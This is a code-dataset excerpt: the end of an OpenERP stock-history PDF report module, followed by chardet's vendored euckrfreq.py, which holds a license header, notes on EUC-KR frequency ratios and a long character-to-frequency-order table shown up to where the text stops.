prod_name = unicodedata.normalize('NFKD',prod_name)
prod_name = prod_name.encode('ascii','replace')
gt.add(prod_id, prod_name, products[prod_id])
gt.draw()
gt.close()
self.obj = external_pdf(io.getvalue())
self.obj.render()
return (self.obj.pdf, 'pdf')
report_stock('report.stock.product.history')
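# Illustrative only: with the registration above, the report service can
# render this report by name. The exact entry point varies across OpenERP
# versions; the call below is an assumption based on the 8.0 API:
#
#     from openerp import report
#     pdf_data, fmt = report.render_report(
#         cr, uid, product_ids, 'stock.product.history', {})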
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mhotwagner/abackend | abackend-env/lib/python3.5/site-packages/pip/_vendor/requests/packages/chardet/euckrfreq.py | 3121 | 45978 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Sampling from about 20M of text materials, including literature and computer technology
# 128 --> 0.79
# 256 --> 0.92
# 512 --> 0.986
# 1024 --> 0.99944
# 2048 --> 0.99999
#
# Ideal Distribution Ratio = 0.98653 / (1-0.98653) = 73.24
# Random Distribution Ratio = 512 / (2350-512) = 0.279.
#
# Typical Distribution Ratio
EUCKR_TYPICAL_DISTRIBUTION_RATIO = 6.0
EUCKR_TABLE_SIZE = 2352
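# Illustrative sketch (not part of chardet's API): a distribution analyser
# counts characters whose frequency order is below 512 as "frequent" and
# compares the frequent/rare ratio against the typical ratio above:
#
#     def looks_like_euckr(freq_orders):
#         freq = sum(1 for o in freq_orders if o < 512)
#         rare = sum(1 for o in freq_orders if o >= 512)
#         if rare == 0:
#             return True
#         return float(freq) / rare >= EUCKR_TYPICAL_DISTRIBUTION_RATIO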
# Char to FreqOrder table
EUCKRCharToFreqOrder = ( \
13, 130, 120,1396, 481,1719,1720, 328, 609, 212,1721, 707, 400, 299,1722, 87,
1397,1723, 104, 536,1117,1203,1724,1267, 685,1268, 508,1725,1726,1727,1728,1398,
1399,1729,1730,1731, 141, 621, 326,1057, 368,1732, 267, 488, 20,1733,1269,1734,
945,1400,1735, 47, 904,1270,1736,1737, 773, 248,1738, 409, 313, 786, 429,1739,
116, 987, 813,1401, 683, 75,1204, 145,1740,1741,1742,1743, 16, 847, 667, 622,
708,1744,1745,1746, 966, 787, 304, 129,1747, 60, 820, 123, 676,1748,1749,1750,
1751, 617,1752, 626,1753,1754,1755,1756, 653,1757,1758,1759,1760,1761,1762, 856,
344,1763,1764,1765,1766, 89, 401, 418, 806, 905, 848,1767,1768,1769, 946,1205,
709,1770,1118,1771, 241,1772,1773,1774,1271,1775, 569,1776, 999,1777,1778,1779,
1780, 337, 751,1058, 28, 628, 254,1781, 177, 906, 270, 349, 891,1079,1782, 19,
1783, 379,1784, 315,1785, 629, 754,1402, 559,1786, 636, 203,1206,1787, 710, 567,
1788, 935, 814,1789,1790,1207, 766, 528,1791,1792,1208,1793,1794,1795,1796,1797,
1403,1798,1799, 533,1059,1404,1405,1156,1406, 936, 884,1080,1800, 351,1801,1802,
1803,1804,1805, 801,1806,1807,1808,1119,1809,1157, 714, 474,1407,1810, 298, 899,
885,1811,1120, 802,1158,1812, 892,1813,1814,1408, 659,1815,1816,1121,1817,1818,
1819,1820,1821,1822, 319,1823, 594, 545,1824, 815, 937,1209,1825,1826, 573,1409,
1022,1827,1210,1828,1829,1830,1831,1832,1833, 556, 722, 807,1122,1060,1834, 697,
1835, 900, 557, 715,1836,1410, 540,1411, 752,1159, 294, 597,1211, 976, 803, 770,
1412,1837,1838, 39, 794,1413, 358,1839, 371, 925,1840, 453, 661, 788, 531, 723,
544,1023,1081, 869, 91,1841, 392, 430, 790, 602,1414, 677,1082, 457,1415,1416,
1842,1843, 475, 327,1024,1417, 795, 121,1844, 733, 403,1418,1845,1846,1847, 300,
119, 711,1212, 627,1848,1272, 207,1849,1850, 796,1213, 382,1851, 519,1852,1083,
893,1853,1854,1855, 367, 809, 487, 671,1856, 663,1857,1858, 956, 471, 306, 857,
1859,1860,1160,1084,1861,1862,1863,1864,1865,1061,1866,1867,1868,1869,1870,1871,
282, 96, 574,1872, 502,1085,1873,1214,1874, 907,1875,1876, 827, 977,1419,1420,
1421, 268,1877,1422,1878,1879,1880, 308,1881, 2, 537,1882,1883,1215,1884,1885,
127, 791,1886,1273,1423,1887, 34, 336, 404, 643,1888, 571, 654, 894, 840,1889,
0, 886,1274, 122, 575, 260, 908, 938,1890,1275, 410, 316,1891,1892, 100,1893,
1894,1123, 48,1161,1124,1025,1895, 633, 901,1276,1896,1897, 115, 816,1898, 317,
1899, 694,1900, 909, 734,1424, 572, 866,1425, 691, 85, 524,1010, 543, 394, 841,
1901,1902,1903,1026,1904,1905,1906,1907,1908,1909, 30, 451, 651, 988, 310,1910,
1911,1426, 810,1216, 93,1912,1913,1277,1217,1914, 858, 759, 45, 58, 181, 610,
269,1915,1916, 131,1062, 551, 443,1000, 821,1427, 957, 895,1086,1917,1918, 375,
1919, 359,1920, 687,1921, 822,1922, 293,1923,1924, 40, 662, 118, 692, 29, 939,
887, 640, 482, 174,1925, 69,1162, 728,1428, 910,1926,1278,1218,1279, 386, 870,
217, 854,1163, 823,1927,1928,1929,1930, 834,1931, 78,1932, 859,1933,1063,1934,
1935,1936,1937, 438,1164, 208, 595,1938,1939,1940,1941,1219,1125,1942, 280, 888,
1429,1430,1220,1431,1943,1944,1945,1946,1947,1280, 150, 510,1432,1948,1949,1950,
1951,1952,1953,1954,1011,1087,1955,1433,1043,1956, 881,1957, 614, 958,1064,1065,
1221,1958, 638,1001, 860, 967, 896,1434, 989, 492, 553,1281,1165,1959,1282,1002,
1283,1222,1960,1961,1962,1963, 36, 383, 228, 753, 247, 454,1964, 876, 678,1965,
1966,1284, 126, 464, 490, 835, 136, 672, 529, 940,1088,1435, 473,1967,1968, 467,
50, 390, 227, 587, 279, 378, 598, 792, 968, 240, 151, 160, 849, 882,1126,1285,
639,1044, 133, 140, 288, 360, 811, 563,1027, 561, 142, 523,1969,1970,1971, 7,
103, 296, 439, 407, 506, 634, 990,1972,1973,1974,1975, 645,1976,1977,1978,1979,
1980,1981, 236,1982,1436,1983,1984,1089, 192, 828, 618, 518,1166, 333,1127,1985,
818,1223,1986,1987,1988,1989,1990,1991,1992,1993, 342,1128,1286, 746, 842,1994,
1995, 560, 223,1287, 98, 8, 189, 650, 978,1288,1996,1437,1997, 17, 345, 250,
423, 277, 234, 512, 226, 97, 289, 42, 167,1998, 201,1999,2000, 843, 836, 824,
532, 338, 783,1090, 182, 576, 436,1438,1439, 527, 500,2001, 947, 889,2002,2003,
2004,2005, 262, 600, 314, 447,2006, 547,2007, 693, 738,1129,2008, 71,1440, 745,
619, 688,2009, 829,2010,2011, 147,2012, 33, 948,2013,2014, 74, 224,2015, 61,
191, 918, 399, 637,2016,1028,1130, 257, 902,2017,2018,2019,2020,2021,2022,2023,
2024,2025,2026, 837,2027,2028,2029,2030, 179, 874, 591, 52, 724, 246,2031,2032,
2033,2034,1167, 969,2035,1289, 630, 605, 911,1091,1168,2036,2037,2038,1441, 912,
2039, 623,2040,2041, 253,1169,1290,2042,1442, 146, 620, 611, 577, 433,2043,1224,
719,1170, 959, 440, 437, 534, 84, 388, 480,1131, 159, 220, 198, 679,2044,1012,
819,1066,1443, 113,1225, 194, 318,1003,1029,2045,2046,2047,2048,1067,2049,2050,
2051,2052,2053, 59, 913, 112,2054, 632,2055, 455, 144, 739,1291,2056, 273, 681,
499,2057, 448,2058,2059, 760,2060,2061, 970, 384, 169, 245,1132,2062,2063, 414,
1444,2064,2065, 41, 235,2066, 157, 252, 877, 568, 919, 789, 580,2067, 725,2068,
2069,1292,2070,2071,1445,2072,1446,2073,2074, 55, 588, 66,1447, 271,1092,2075,
1226,2076, 960,1013, 372,2077,2078,2079,2080,2081,1293,2082,2083,2084,2085, 850,
2086,2087,2088,2089,2090, 186,2091,1068, 180,2092,2093,2094, 109,1227, 522, 606,
2095, 867,1448,1093, 991,1171, 926, 353,1133,2096, 581,2097,2098,2099,1294,1449,
1450,2100, 596,1172,1014,1228,2101,1451,1295,1173,1229,2102,2103,1296,1134,1452,
949,1135,2104,2105,1094,1453,1454,1455,2106,1095,2107,2108,2109,2110,2111,2112,
2113,2114,2115,2116,2117, 804,2118,2119,1230,1231, 805,1456, 405,1136,2120,2121,
2122,2123,2124, 720, 701,1297, 992,1457, 927,1004,2125,2126,2127,2128,2129,2130,
22, 417,2131, 303,2132, 385,2133, 971, 520, 513,2134,1174, 73,1096, 231, 274,
962,1458, 673,2135,1459,2136, 152,1137,2137,2138,2139,2140,1005,1138,1460,1139,
2141,2142,2143,2144, 11, 374, 844,2145, 154,1232, 46,1461,2146, 838, 830, 721,
1233, 106,2147, 90, 428, 462, 578, 566,1175, 352,2148,2149, 538,1234, 124,1298,
2150,1462, 761, 565,2151, 686,2152, 649,2153, 72, 173,2154, 460, 415,2155,1463,
2156,1235, 305,2157,2158,2159,2160,2161,2162, 579,2163,2164,2165,2166,2167, 747,
2168,2169,2170,2171,1464, 669,2172,2173,2174,2175,2176,1465,2177, 23, 530, 285,
2178, 335, 729,2179, 397,2180,2181,2182,1030,2183,2184, 698,2185,2186, 325,2187,
2188, 369,2189, 799,1097,1015, 348,2190,1069, 680,2191, 851,1466,2192,2193, 10,
2194, 613, 424,2195, 979, 108, 449, 589, 27, 172, 81,1031, 80, 774, 281, 350,
1032, 525, 301, 582,1176,2196, 674,1045,2197,2198,1467, 730, 762,2199,2200,2201,
2202,1468,2203, 993,2204,2205, 266,1070, 963,1140,2206,2207,2208, 664,1098, 972,
2209,2210,2211,1177,1469,1470, 871,2212,2213,2214,2215,2216,1471,2217,2218,2219,
2220,2221,2222,2223,2224,2225,2226,2227,1472,1236,2228,2229,2230,2231,2232,2233,
2234,2235,1299,2236,2237, 200,2238, 477, 373,2239,2240, 731, 825, 777,2241,2242,
2243, 521, 486, 548,2244,2245,2246,1473,1300, 53, 549, 137, 875, 76, 158,2247,
1301,1474, 469, 396,1016, 278, 712,2248, 321, 442, 503, 767, 744, 941,1237,1178,
1475,2249, 82, 178,1141,1179, 973,2250,1302,2251, 297,2252,2253, 570,2254,2255,
2256, 18, 450, 206,2257, 290, 292,1142,2258, 511, 162, 99, 346, 164, 735,2259,
1476,1477, 4, 554, 343, 798,1099,2260,1100,2261, 43, 171,1303, 139, 215,2262,
2263, 717, 775,2264,1033, 322, 216,2265, 831,2266, 149,2267,1304,2268,2269, 702,
1238, 135, 845, 347, 309,2270, 484,2271, 878, 655, 238,1006,1478,2272, 67,2273,
295,2274,2275, 461,2276, 478, 942, 412,2277,1034,2278,2279,2280, 265,2281, 541,
2282,2283,2284,2285,2286, 70, 852,1071,2287,2288,2289,2290, 21, 56, 509, 117,
432,2291,2292, 331, 980, 552,1101, 148, 284, 105, 393,1180,1239, 755,2293, 187,
2294,1046,1479,2295, 340,2296, 63,1047, 230,2297,2298,1305, 763,1306, 101, 800,
808, 494,2299,2300,2301, 903,2302, 37,1072, 14, 5,2303, 79, 675,2304, 312,
2305,2306,2307,2308,2309,1480, 6,1307,2310,2311,2312, 1, 470, 35, 24, 229,
2313, 695, 210, 86, 778, 15, 784, 592, 779, 32, 77, 855, 964,2314, 259,2315,
501, 380,2316,2317, 83, 981, 153, 689,1308,1481,1482,1483,2318,2319, 716,1484,
2320,2321,2322,2323,2324,2325,1485,2326,2327, 128, 57, 68, 261,1048, 211, 170,
1240, 31,2328, 51, 435, 742,2329,2330,2331, 635,2332, 264, 456,2333,2334,2335,
425,2336,1486, 143, 507, 263, 943,2337, 363, 920,1487, 256,1488,1102, 243, 601,
1489,2338,2339,2340,2341,2342,2343,2344, 861,2345,2346,2347,2348,2349,2350, 395,
2351,1490,1491, 62, 535, 166, 225,2352,2353, 668, 419,1241, 138, 604, 928,2354,
1181,2355,1492,1493,2356,2357,2358,1143,2359, 696,2360, 387, 307,1309, 682, 476,
2361,2362, 332, 12, 222, 156,2363, 232,2364, 641, 276, 656, 517,1494,1495,1035,
416, 736,1496,2365,1017, 586,2366,2367,2368,1497,2369, 242,2370,2371,2372,1498,
2373, 965, 713,2374,2375,2376,2377, 740, 982,1499, 944,1500,1007,2378,2379,1310,
1501,2380,2381,2382, 785, 329,2383,2384,1502,2385,2386,2387, 932,2388,1503,2389,
2390,2391,2392,1242,2393,2394,2395,2396,2397, 994, 950,2398,2399,2400,2401,1504,
1311,2402,2403,2404,2405,1049, 749,2406,2407, 853, 718,1144,1312,2408,1182,1505,
2409,2410, 255, 516, 479, 564, 550, 214,1506,1507,1313, 413, 239, 444, 339,1145,
1036,1508,1509,1314,1037,1510,1315,2411,1511,2412,2413,2414, 176, 703, 497, 624,
593, 921, 302,2415, 341, 165,1103,1512,2416,1513,2417,2418,2419, 376,2420, 700,
2421,2422,2423, 258, 768,1316,2424,1183,2425, 995, 608,2426,2427,2428,2429, 221,
2430,2431,2432,2433,2434,2435,2436,2437, 195, 323, 726, 188, 897, 983,1317, 377,
644,1050, 879,2438, 452,2439,2440,2441,2442,2443,2444, 914,2445,2446,2447,2448,
915, 489,2449,1514,1184,2450,2451, 515, 64, 427, 495,2452, 583,2453, 483, 485,
1038, 562, 213,1515, 748, 666,2454,2455,2456,2457, 334,2458, 780, 996,1008, 705,
1243,2459,2460,2461,2462,2463, 114,2464, 493,1146, 366, 163,1516, 961,1104,2465,
291,2466,1318,1105,2467,1517, 365,2468, 355, 951,1244,2469,1319,2470, 631,2471,
2472, 218,1320, 364, 320, 756,1518,1519,1321,1520,1322,2473,2474,2475,2476, 997,
2477,2478,2479,2480, 665,1185,2481, 916,1521,2482,2483,2484, 584, 684,2485,2486,
797,2487,1051,1186,2488,2489,2490,1522,2491,2492, 370,2493,1039,1187, 65,2494,
434, 205, 463,1188,2495, 125, 812, 391, 402, 826, 699, 286, 398, 155, 781, 771,
585,2496, 590, 505,1073,2497, 599, 244, 219, 917,1018, 952, 646,1523,2498,1323,
2499,2500, 49, 984, 354, 741,2501, 625,2502,1324,2503,1019, 190, 357, 757, 491,
95, 782, 868,2504,2505,2506,2507,2508,2509, 134,1524,1074, 422,1525, 898,2510,
161,2511,2512,2513,2514, 769,2515,1526,2516,2517, 411,1325,2518, 472,1527,2519,
2520,2521,2522,2523,2524, 985,2525,2526,2527,2528,2529,2530, 764,2531,1245,2532,
2533, 25, 204, 311,2534, 496,2535,1052,2536,2537,2538,2539,2540,2541,2542, 199,
704, 504, 468, 758, 657,1528, 196, 44, 839,1246, 272, 750,2543, 765, 862,2544,
2545,1326,2546, 132, 615, 933,2547, 732,2548,2549,2550,1189,1529,2551, 283,1247,
1053, 607, 929,2552,2553,2554, 930, 183, 872, 616,1040,1147,2555,1148,1020, 441,
249,1075,2556,2557,2558, 466, 743,2559,2560,2561, 92, 514, 426, 420, 526,2562,
2563,2564,2565,2566,2567,2568, 185,2569,2570,2571,2572, 776,1530, 658,2573, 362,
2574, 361, 922,1076, 793,2575,2576,2577,2578,2579,2580,1531, 251,2581,2582,2583,
2584,1532, 54, 612, 237,1327,2585,2586, 275, 408, 647, 111,2587,1533,1106, 465,
3, 458, 9, 38,2588, 107, 110, 890, 209, 26, 737, 498,2589,1534,2590, 431,
202, 88,1535, 356, 287,1107, 660,1149,2591, 381,1536, 986,1150, 445,1248,1151,
974,2592,2593, 846,2594, 446, 953, 184,1249,1250, 727,2595, 923, 193, 883,2596,
2597,2598, 102, 324, 539, 817,2599, 421,1041,2600, 832,2601, 94, 175, 197, 406,
2602, 459,2603,2604,2605,2606,2607, 330, 555,2608,2609,2610, 706,1108, 389,2611,
2612,2613,2614, 233,2615, 833, 558, 931, 954,1251,2616,2617,1537, 546,2618,2619,
1009,2620,2621,2622,1538, 690,1328,2623, 955,2624,1539,2625,2626, 772,2627,2628,
2629,2630,2631, 924, 648, 863, 603,2632,2633, 934,1540, 864, 865,2634, 642,1042,
670,1190,2635,2636,2637,2638, 168,2639, 652, 873, 542,1054,1541,2640,2641,2642, # 512, 256
#Everything below is of no interest for detection purpose
2643,2644,2645,2646,2647,2648,2649,2650,2651,2652,2653,2654,2655,2656,2657,2658,
2659,2660,2661,2662,2663,2664,2665,2666,2667,2668,2669,2670,2671,2672,2673,2674,
2675,2676,2677,2678,2679,2680,2681,2682,2683,2684,2685,2686,2687,2688,2689,2690,
2691,2692,2693,2694,2695,2696,2697,2698,2699,1542, 880,2700,2701,2702,2703,2704,
2705,2706,2707,2708,2709,2710,2711,2712,2713,2714,2715,2716,2717,2718,2719,2720,
2721,2722,2723,2724,2725,1543,2726,2727,2728,2729,2730,2731,2732,1544,2733,2734,
2735,2736,2737,2738,2739,2740,2741,2742,2743,2744,2745,2746,2747,2748,2749,2750,
2751,2752,2753,2754,1545,2755,2756,2757,2758,2759,2760,2761,2762,2763,2764,2765,
2766,1546,2767,1547,2768,2769,2770,2771,2772,2773,2774,2775,2776,2777,2778,2779,
2780,2781,2782,2783,2784,2785,2786,1548,2787,2788,2789,1109,2790,2791,2792,2793,
2794,2795,2796,2797,2798,2799,2800,2801,2802,2803,2804,2805,2806,2807,2808,2809,
2810,2811,2812,1329,2813,2814,2815,2816,2817,2818,2819,2820,2821,2822,2823,2824,
2825,2826,2827,2828,2829,2830,2831,2832,2833,2834,2835,2836,2837,2838,2839,2840,
2841,2842,2843,2844,2845,2846,2847,2848,2849,2850,2851,2852,2853,2854,2855,2856,
1549,2857,2858,2859,2860,1550,2861,2862,1551,2863,2864,2865,2866,2867,2868,2869,
2870,2871,2872,2873,2874,1110,1330,2875,2876,2877,2878,2879,2880,2881,2882,2883,
2884,2885,2886,2887,2888,2889,2890,2891,2892,2893,2894,2895,2896,2897,2898,2899,
2900,2901,2902,2903,2904,2905,2906,2907,2908,2909,2910,2911,2912,2913,2914,2915,
2916,2917,2918,2919,2920,2921,2922,2923,2924,2925,2926,2927,2928,2929,2930,1331,
2931,2932,2933,2934,2935,2936,2937,2938,2939,2940,2941,2942,2943,1552,2944,2945,
2946,2947,2948,2949,2950,2951,2952,2953,2954,2955,2956,2957,2958,2959,2960,2961,
2962,2963,2964,1252,2965,2966,2967,2968,2969,2970,2971,2972,2973,2974,2975,2976,
2977,2978,2979,2980,2981,2982,2983,2984,2985,2986,2987,2988,2989,2990,2991,2992,
2993,2994,2995,2996,2997,2998,2999,3000,3001,3002,3003,3004,3005,3006,3007,3008,
3009,3010,3011,3012,1553,3013,3014,3015,3016,3017,1554,3018,1332,3019,3020,3021,
3022,3023,3024,3025,3026,3027,3028,3029,3030,3031,3032,3033,3034,3035,3036,3037,
3038,3039,3040,3041,3042,3043,3044,3045,3046,3047,3048,3049,3050,1555,3051,3052,
3053,1556,1557,3054,3055,3056,3057,3058,3059,3060,3061,3062,3063,3064,3065,3066,
3067,1558,3068,3069,3070,3071,3072,3073,3074,3075,3076,1559,3077,3078,3079,3080,
3081,3082,3083,1253,3084,3085,3086,3087,3088,3089,3090,3091,3092,3093,3094,3095,
3096,3097,3098,3099,3100,3101,3102,3103,3104,3105,3106,3107,3108,1152,3109,3110,
3111,3112,3113,1560,3114,3115,3116,3117,1111,3118,3119,3120,3121,3122,3123,3124,
3125,3126,3127,3128,3129,3130,3131,3132,3133,3134,3135,3136,3137,3138,3139,3140,
3141,3142,3143,3144,3145,3146,3147,3148,3149,3150,3151,3152,3153,3154,3155,3156,
3157,3158,3159,3160,3161,3162,3163,3164,3165,3166,3167,3168,3169,3170,3171,3172,
3173,3174,3175,3176,1333,3177,3178,3179,3180,3181,3182,3183,3184,3185,3186,3187,
3188,3189,1561,3190,3191,1334,3192,3193,3194,3195,3196,3197,3198,3199,3200,3201,
3202,3203,3204,3205,3206,3207,3208,3209,3210,3211,3212,3213,3214,3215,3216,3217,
3218,3219,3220,3221,3222,3223,3224,3225,3226,3227,3228,3229,3230,3231,3232,3233,
3234,1562,3235,3236,3237,3238,3239,3240,3241,3242,3243,3244,3245,3246,3247,3248,
3249,3250,3251,3252,3253,3254,3255,3256,3257,3258,3259,3260,3261,3262,3263,3264,
3265,3266,3267,3268,3269,3270,3271,3272,3273,3274,3275,3276,3277,1563,3278,3279,
3280,3281,3282,3283,3284,3285,3286,3287,3288,3289,3290,3291,3292,3293,3294,3295,
3296,3297,3298,3299,3300,3301,3302,3303,3304,3305,3306,3307,3308,3309,3310,3311,
3312,3313,3314,3315,3316,3317,3318,3319,3320,3321,3322,3323,3324,3325,3326,3327,
3328,3329,3330,3331,3332,3333,3334,3335,3336,3337,3338,3339,3340,3341,3342,3343,
3344,3345,3346,3347,3348,3349,3350,3351,3352,3353,3354,3355,3356,3357,3358,3359,
3360,3361,3362,3363,3364,1335,3365,3366,3367,3368,3369,3370,3371,3372,3373,3374,
3375,3376,3377,3378,3379,3380,3381,3382,3383,3384,3385,3386,3387,1336,3388,3389,
3390,3391,3392,3393,3394,3395,3396,3397,3398,3399,3400,3401,3402,3403,3404,3405,
3406,3407,3408,3409,3410,3411,3412,3413,3414,1337,3415,3416,3417,3418,3419,1338,
3420,3421,3422,1564,1565,3423,3424,3425,3426,3427,3428,3429,3430,3431,1254,3432,
3433,3434,1339,3435,3436,3437,3438,3439,1566,3440,3441,3442,3443,3444,3445,3446,
3447,3448,3449,3450,3451,3452,3453,3454,1255,3455,3456,3457,3458,3459,1567,1191,
3460,1568,1569,3461,3462,3463,1570,3464,3465,3466,3467,3468,1571,3469,3470,3471,
3472,3473,1572,3474,3475,3476,3477,3478,3479,3480,3481,3482,3483,3484,3485,3486,
1340,3487,3488,3489,3490,3491,3492,1021,3493,3494,3495,3496,3497,3498,1573,3499,
1341,3500,3501,3502,3503,3504,3505,3506,3507,3508,3509,3510,3511,1342,3512,3513,
3514,3515,3516,1574,1343,3517,3518,3519,1575,3520,1576,3521,3522,3523,3524,3525,
3526,3527,3528,3529,3530,3531,3532,3533,3534,3535,3536,3537,3538,3539,3540,3541,
3542,3543,3544,3545,3546,3547,3548,3549,3550,3551,3552,3553,3554,3555,3556,3557,
3558,3559,3560,3561,3562,3563,3564,3565,3566,3567,3568,3569,3570,3571,3572,3573,
3574,3575,3576,3577,3578,3579,3580,1577,3581,3582,1578,3583,3584,3585,3586,3587,
3588,3589,3590,3591,3592,3593,3594,3595,3596,3597,3598,3599,3600,3601,3602,3603,
3604,1579,3605,3606,3607,3608,3609,3610,3611,3612,3613,3614,3615,3616,3617,3618,
3619,3620,3621,3622,3623,3624,3625,3626,3627,3628,3629,1580,3630,3631,1581,3632,
3633,3634,3635,3636,3637,3638,3639,3640,3641,3642,3643,3644,3645,3646,3647,3648,
3649,3650,3651,3652,3653,3654,3655,3656,1582,3657,3658,3659,3660,3661,3662,3663,
3664,3665,3666,3667,3668,3669,3670,3671,3672,3673,3674,3675,3676,3677,3678,3679,
3680,3681,3682,3683,3684,3685,3686,3687,3688,3689,3690,3691,3692,3693,3694,3695,
3696,3697,3698,3699,3700,1192,3701,3702,3703,3704,1256,3705,3706,3707,3708,1583,
1257,3709,3710,3711,3712,3713,3714,3715,3716,1584,3717,3718,3719,3720,3721,3722,
3723,3724,3725,3726,3727,3728,3729,3730,3731,3732,3733,3734,3735,3736,3737,3738,
3739,3740,3741,3742,3743,3744,3745,1344,3746,3747,3748,3749,3750,3751,3752,3753,
3754,3755,3756,1585,3757,3758,3759,3760,3761,3762,3763,3764,3765,3766,1586,3767,
3768,3769,3770,3771,3772,3773,3774,3775,3776,3777,3778,1345,3779,3780,3781,3782,
3783,3784,3785,3786,3787,3788,3789,3790,3791,3792,3793,3794,3795,1346,1587,3796,
3797,1588,3798,3799,3800,3801,3802,3803,3804,3805,3806,1347,3807,3808,3809,3810,
3811,1589,3812,3813,3814,3815,3816,3817,3818,3819,3820,3821,1590,3822,3823,1591,
1348,3824,3825,3826,3827,3828,3829,3830,1592,3831,3832,1593,3833,3834,3835,3836,
3837,3838,3839,3840,3841,3842,3843,3844,1349,3845,3846,3847,3848,3849,3850,3851,
3852,3853,3854,3855,3856,3857,3858,1594,3859,3860,3861,3862,3863,3864,3865,3866,
3867,3868,3869,1595,3870,3871,3872,3873,1596,3874,3875,3876,3877,3878,3879,3880,
3881,3882,3883,3884,3885,3886,1597,3887,3888,3889,3890,3891,3892,3893,3894,3895,
1598,3896,3897,3898,1599,1600,3899,1350,3900,1351,3901,3902,1352,3903,3904,3905,
3906,3907,3908,3909,3910,3911,3912,3913,3914,3915,3916,3917,3918,3919,3920,3921,
3922,3923,3924,1258,3925,3926,3927,3928,3929,3930,3931,1193,3932,1601,3933,3934,
3935,3936,3937,3938,3939,3940,3941,3942,3943,1602,3944,3945,3946,3947,3948,1603,
3949,3950,3951,3952,3953,3954,3955,3956,3957,3958,3959,3960,3961,3962,3963,3964,
3965,1604,3966,3967,3968,3969,3970,3971,3972,3973,3974,3975,3976,3977,1353,3978,
3979,3980,3981,3982,3983,3984,3985,3986,3987,3988,3989,3990,3991,1354,3992,3993,
3994,3995,3996,3997,3998,3999,4000,4001,4002,4003,4004,4005,4006,4007,4008,4009,
4010,4011,4012,4013,4014,4015,4016,4017,4018,4019,4020,4021,4022,4023,1355,4024,
4025,4026,4027,4028,4029,4030,4031,4032,4033,4034,4035,4036,4037,4038,4039,4040,
1605,4041,4042,4043,4044,4045,4046,4047,4048,4049,4050,4051,4052,4053,4054,4055,
4056,4057,4058,4059,4060,1606,4061,4062,4063,4064,1607,4065,4066,4067,4068,4069,
4070,4071,4072,4073,4074,4075,4076,1194,4077,4078,1608,4079,4080,4081,4082,4083,
4084,4085,4086,4087,1609,4088,4089,4090,4091,4092,4093,4094,4095,4096,4097,4098,
4099,4100,4101,4102,4103,4104,4105,4106,4107,4108,1259,4109,4110,4111,4112,4113,
4114,4115,4116,4117,4118,4119,4120,4121,4122,4123,4124,1195,4125,4126,4127,1610,
4128,4129,4130,4131,4132,4133,4134,4135,4136,4137,1356,4138,4139,4140,4141,4142,
4143,4144,1611,4145,4146,4147,4148,4149,4150,4151,4152,4153,4154,4155,4156,4157,
4158,4159,4160,4161,4162,4163,4164,4165,4166,4167,4168,4169,4170,4171,4172,4173,
4174,4175,4176,4177,4178,4179,4180,4181,4182,4183,4184,4185,4186,4187,4188,4189,
4190,4191,4192,4193,4194,4195,4196,4197,4198,4199,4200,4201,4202,4203,4204,4205,
4206,4207,4208,4209,4210,4211,4212,4213,4214,4215,4216,4217,4218,4219,1612,4220,
4221,4222,4223,4224,4225,4226,4227,1357,4228,1613,4229,4230,4231,4232,4233,4234,
4235,4236,4237,4238,4239,4240,4241,4242,4243,1614,4244,4245,4246,4247,4248,4249,
4250,4251,4252,4253,4254,4255,4256,4257,4258,4259,4260,4261,4262,4263,4264,4265,
4266,4267,4268,4269,4270,1196,1358,4271,4272,4273,4274,4275,4276,4277,4278,4279,
4280,4281,4282,4283,4284,4285,4286,4287,1615,4288,4289,4290,4291,4292,4293,4294,
4295,4296,4297,4298,4299,4300,4301,4302,4303,4304,4305,4306,4307,4308,4309,4310,
4311,4312,4313,4314,4315,4316,4317,4318,4319,4320,4321,4322,4323,4324,4325,4326,
4327,4328,4329,4330,4331,4332,4333,4334,1616,4335,4336,4337,4338,4339,4340,4341,
4342,4343,4344,4345,4346,4347,4348,4349,4350,4351,4352,4353,4354,4355,4356,4357,
4358,4359,4360,1617,4361,4362,4363,4364,4365,1618,4366,4367,4368,4369,4370,4371,
4372,4373,4374,4375,4376,4377,4378,4379,4380,4381,4382,4383,4384,4385,4386,4387,
4388,4389,4390,4391,4392,4393,4394,4395,4396,4397,4398,4399,4400,4401,4402,4403,
4404,4405,4406,4407,4408,4409,4410,4411,4412,4413,4414,4415,4416,1619,4417,4418,
4419,4420,4421,4422,4423,4424,4425,1112,4426,4427,4428,4429,4430,1620,4431,4432,
4433,4434,4435,4436,4437,4438,4439,4440,4441,4442,1260,1261,4443,4444,4445,4446,
4447,4448,4449,4450,4451,4452,4453,4454,4455,1359,4456,4457,4458,4459,4460,4461,
4462,4463,4464,4465,1621,4466,4467,4468,4469,4470,4471,4472,4473,4474,4475,4476,
4477,4478,4479,4480,4481,4482,4483,4484,4485,4486,4487,4488,4489,1055,4490,4491,
4492,4493,4494,4495,4496,4497,4498,4499,4500,4501,4502,4503,4504,4505,4506,4507,
4508,4509,4510,4511,4512,4513,4514,4515,4516,4517,4518,1622,4519,4520,4521,1623,
4522,4523,4524,4525,4526,4527,4528,4529,4530,4531,4532,4533,4534,4535,1360,4536,
4537,4538,4539,4540,4541,4542,4543, 975,4544,4545,4546,4547,4548,4549,4550,4551,
4552,4553,4554,4555,4556,4557,4558,4559,4560,4561,4562,4563,4564,4565,4566,4567,
4568,4569,4570,4571,1624,4572,4573,4574,4575,4576,1625,4577,4578,4579,4580,4581,
4582,4583,4584,1626,4585,4586,4587,4588,4589,4590,4591,4592,4593,4594,4595,1627,
4596,4597,4598,4599,4600,4601,4602,4603,4604,4605,4606,4607,4608,4609,4610,4611,
4612,4613,4614,4615,1628,4616,4617,4618,4619,4620,4621,4622,4623,4624,4625,4626,
